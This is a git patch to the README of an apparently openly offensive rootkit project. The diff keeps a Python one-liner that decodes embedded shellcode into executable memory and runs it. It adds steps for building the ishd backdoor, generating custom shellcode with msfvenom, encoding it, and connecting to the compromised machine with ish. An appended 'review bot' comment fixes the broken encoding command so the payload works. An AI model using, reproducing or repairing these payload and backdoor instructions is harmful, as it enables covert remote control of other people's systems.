From 0bec41951c3ef89db769a61948ea9664340aac94 Mon Sep 17 00:00:00 2001 From: mephistolist <49227141+mephistolist@users.noreply.github.com> Date: Mon, 28 Oct 2024 19:17:21 +0000 Subject: [PATCH] Update README.md --- README.md | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5f39f21..14e4c9f 100644 --- a/README.md +++ b/README.md @@ -15,8 +15,21 @@ With FreeBSD, it will depend on the version of python installed. If you have pyt ``` python3.11 -c 'import base64, mmap, ctypes; encoded_shellcode = "SDHJSIHp+P///0iNBe////9Iu67h2fdth+YDSDFYJ0gt+P///+L05tALH0+H5gOBibaaCKiWa53Sq9gZ7pJsgaiKvyjLqi7Y0ffEQu6Va8rhhqU6z2/l5tAZv+5P3Qyr4dn3bYfmAw=="; shellcode = base64.b64decode(encoded_shellcode); mem = mmap.mmap(-1, len(shellcode), mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS, mmap.PROT_WRITE | mmap.PROT_READ | mmap.PROT_EXEC); mem.write(shellcode); addr = ctypes.addressof(ctypes.c_char.from_buffer(mem)); shell_func = ctypes.CFUNCTYPE(None)(addr); print("...and I will not have to send a second."); shell_func()' 2>/dev/null -``` +``` + +The path to binary here in these examples is hardcoded, but you may go into the ISHELL-v0.3 folder and type 'make linux' or 'make bsd' to build ish and ishd. Then you can make your own shellcode like this: + +msfvenom -p linux/x64/exec CMD=/path/to/ishd -f c -b "\x00\x0a\x0d" > +shellcode.txt + +You can parse out only the shellcode and base64 encode it like this: -From there you may go into the ISHELL-v0.3 folder and type 'make linux' or 'make bsd' to build ish. Then you may run ish with the ip of the device the rootkit was ran on to connect. +grep '"' shellcode.txt | tr "\n" " " | sed -e 's/\" \"//g;s/\"//g;s/;//g' +&& echo " " | base64 + +Then you may run ish with the ip of the device the rootkit was ran on to connect. Currently tested on x86_64 Debian Trixie and FreeBSD 14.1 + + +
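Review bot: the encoding pipeline added in this hunk never base64-encodes the shellcode. In `grep '"' shellcode.txt | tr "\n" " " | sed -e 's/\" \"//g;s/\"//g;s/;//g' && echo " " | base64` the `&&` terminates the pipeline, so the sed output is printed unencoded and only the single space from `echo " "` reaches `base64`. Even with `&&` changed to `|`, sed yields the `-f c` text form (`\x48\x31...`), whereas the `python3.11` loader in the context above calls `base64.b64decode(encoded_shellcode)` and writes the result into the RWX mapping, i.e. it expects base64 of the raw bytes. Dropping the C output and the text munging altogether is simpler and correct: `msfvenom -p linux/x64/exec CMD=/path/to/ishd -f raw | base64 -w0` (or `| base64 | tr -d '\n'` where `-w` is unsupported), pasted into `encoded_shellcode`. Two smaller points on the same lines: the `msfvenom ... -b "\x00\x0a\x0d" >` / `shellcode.txt` command is split across two unfenced lines, so Markdown renders it as one paragraph and it cannot be copied as a command; put both commands in a ``` fence like the python3.11 example above. And since the bytes travel through base64 into a Python `bytes` object, null and newline bytes are harmless here, so `-b "\x00\x0a\x0d"` only forces an unnecessary encoder and a longer payload; it can be omitted.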